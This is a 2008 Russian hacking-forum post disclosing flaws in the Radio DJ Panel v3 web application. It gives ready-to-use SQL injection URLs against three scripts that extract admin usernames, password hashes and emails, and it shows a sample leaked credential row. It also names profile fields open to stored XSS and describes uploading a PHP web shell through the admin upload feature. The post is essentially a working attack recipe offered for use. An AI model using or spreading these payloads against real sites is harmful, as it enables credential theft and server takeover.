ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Radio DJ Panel v3 SQL Injection
  #1  
Старый 27.09.2008, 14:28
Аватар для ~!DoK_tOR!~
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию Radio DJ Panel v3 SQL Injection

Офф.сайт: www.quickscriptz.ca.kz
Префикс таблиц бд: rp_
Табличка: rp_users
Клонки: djname,username,passwrd,email,rank,id
Админка: http://localhost/admin/

[SQL-Injection]

Сценарий timetable.php

Эксплойт:

Код:
http://localhost/[installdir]/timetable.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+rp_users+where+id=1/*
Уязвимого кода предоставить не могу так как всё закодированно в base64(кому надо тот раскодирует).

Смотреть в исходнике

Код:
<td width='150px' align='center'>12:00 - 01:00 AM</td>
<td width='150px' align='center'><b><font color='black'>DJ admin:admin:92ceae43616aa3a8cfde62e236ccc657:admin@admin.ru:Administrator</font></b><td>
Сценарий timetable_public.php

Эксплойт:

Код:
http://localhost/[installdir]/timetable_public.php?week=-1'+union+select+1,concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+rp_users+where+id=1/*
Сценарий viewprofile.php

Эксплойт:

Код:
http://localhost/[installdir]/viewprofile.php?dj=-1'+union+select+concat_ws(0x3a,djname,username,passwrd,email,rank),user(),version(),4,5,6,7,8,9,10,11+from+rp_users+where+id=1/*
[XSS Active]

В профиле уязвимые поля: Favourite Food,Pet Peeves,Sayings,About You,Avatar URL.

[Шелл]

Panel Configuration -> Upload Files льём наш шелл с расширением .php

Шелл будет тут:

http://localhost/[installdir]/uploads/shell.php

(c) ~!Dok_tOR!~
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ